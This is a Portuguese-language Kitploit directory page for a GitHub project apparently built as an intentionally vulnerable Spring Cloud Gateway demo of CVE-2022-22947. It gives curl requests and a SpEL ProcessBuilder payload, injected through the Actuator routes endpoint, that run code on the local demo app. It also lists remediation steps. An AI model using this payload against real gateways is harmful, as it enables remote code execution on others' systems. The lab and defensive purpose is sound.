Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-22947-pb-ai — Um aplicativo de verificação de vulnerabilidades gerado por IA | Kitploit
Ferramentas/GitHubGitHub/skysliently/cve-2022-22947-pb-ai
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de Segurança de APIsAprendizado e Educação
GitHubskysliently/cve-2022-22947-pb-ai

CVE-2022-22947-pb-ai

Um aplicativo de verificação de vulnerabilidades gerado por IA

Ver Repositório
5há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-22947 Aplicativo de verificação de vulnerabilidade do Spring Cloud Gateway

Este é um aplicativo Spring Cloud Gateway projetado especificamente para demonstrar e verificar a vulnerabilidade CVE-2022-22947. O aplicativo usa uma versão vulnerável do Spring Cloud Gateway e pode executar código arbitrário por meio do endpoint Actuator.

Visão geral da vulnerabilidade

O CVE-2022-22947 é uma vulnerabilidade de execução remota de código no Spring Cloud Gateway. Um atacante pode executar código arbitrário adicionando dinamicamente rotas contendo expressões SpEL maliciosas por meio do endpoint Actuator.

Requisitos de ambiente

  • Java 11+
  • Maven 3.6+
  • Sistema macOS (para a demonstração da calculadora)

Iniciar o aplicativo

root@kitploit:~
mvn spring-boot:run

O aplicativo será iniciado em http://localhost:8080.

Etapas de verificação da vulnerabilidade

Passo 1: Adicionar rota maliciosa

Envie uma solicitação POST para o endpoint /actuator/gateway/routes/test para adicionar uma rota contendo uma expressão SpEL maliciosa:

root@kitploit:~
curl -X POST http://localhost:8080/actuator/gateway/routes/test \
  -H "Content-Type: application/json" \
  -d '{
    "id": "test",
    "filters": [
      {
        "name": "AddResponseHeader",
        "args": {
          "name": "Result",
          "value": "#{new java.lang.ProcessBuilder(\"open\", \"-a\", \"Calculator\").start()}"
        }
      }
    ],
    "uri": "http://example.com",
    "predicates": [
      {
        "name": "Path",
        "args": {
          "_genkey_0": "/test"
        }
      }
    ]
  }'

Passo 2: Atualizar as rotas

Envie uma solicitação POST para o endpoint /actuator/gateway/refresh para atualizar as rotas:

root@kitploit:~
curl -X POST http://localhost:8080/actuator/gateway/refresh

Passo 3: Acionar o código malicioso

Acesse a rota maliciosa para acionar a execução do código:

root@kitploit:~
curl http://localhost:8080/test

Resultado esperado

Após explorar a vulnerabilidade com sucesso, o aplicativo Calculadora do macOS será iniciado.

Informações essenciais das solicitações

1. Solicitação para adicionar rota maliciosa

Endpoint: POST /actuator/gateway/routes/test

Cabeçalhos da solicitação:

root@kitploit:~
Content-Type: application/json

Corpo da solicitação:

root@kitploit:~
{
  "id": "test",
  "filters": [
    {
      "name": "AddResponseHeader",
      "args": {
        "name": "Result",
        "value": "#{new java.lang.ProcessBuilder(\"open\", \"-a\", \"Calculator\").start()}"
      }
    }
  ],
  "uri": "http://example.com",
  "predicates": [
    {
      "name": "Path",
      "args": {
        "_genkey_0": "/test"
      }
    }
  ]
}

2. Solicitação para atualizar rotas

Endpoint: POST /actuator/gateway/refresh

3. Solicitação para acionar a vulnerabilidade

Endpoint: GET /test

Análise da vulnerabilidade

Essa vulnerabilidade permite que um atacante adicione rotas dinamicamente por meio do endpoint Actuator e use expressões SpEL nos filtros de rota para executar código arbitrário. O núcleo da vulnerabilidade está no tratamento inadequado de expressões SpEL na configuração de rotas pelo Spring Cloud Gateway.

Recomendações de correção

  1. Atualize para o Spring Cloud Gateway 3.1.1+ ou 3.0.7+
  2. Desative o endpoint Actuator ou restrinja o acesso
  3. Proteja o endpoint Actuator com o Spring Security

Informações de versão

  • Spring Boot: 2.6.2
  • Spring Cloud: 2021.0.0
  • Spring Cloud Gateway: 3.1.0 (versão vulnerável)

Avisos

⚠️ Aviso de segurança: Este aplicativo destina-se apenas a fins educacionais e de pesquisa em segurança. Não use nem implante este aplicativo em ambiente de produção.

⚠️ Aviso legal: Ao usar este aplicativo para testes de vulnerabilidade, certifique-se de ter autorização adequada. Testes não autorizados podem violar leis e regulamentos.

Baixar ferramenta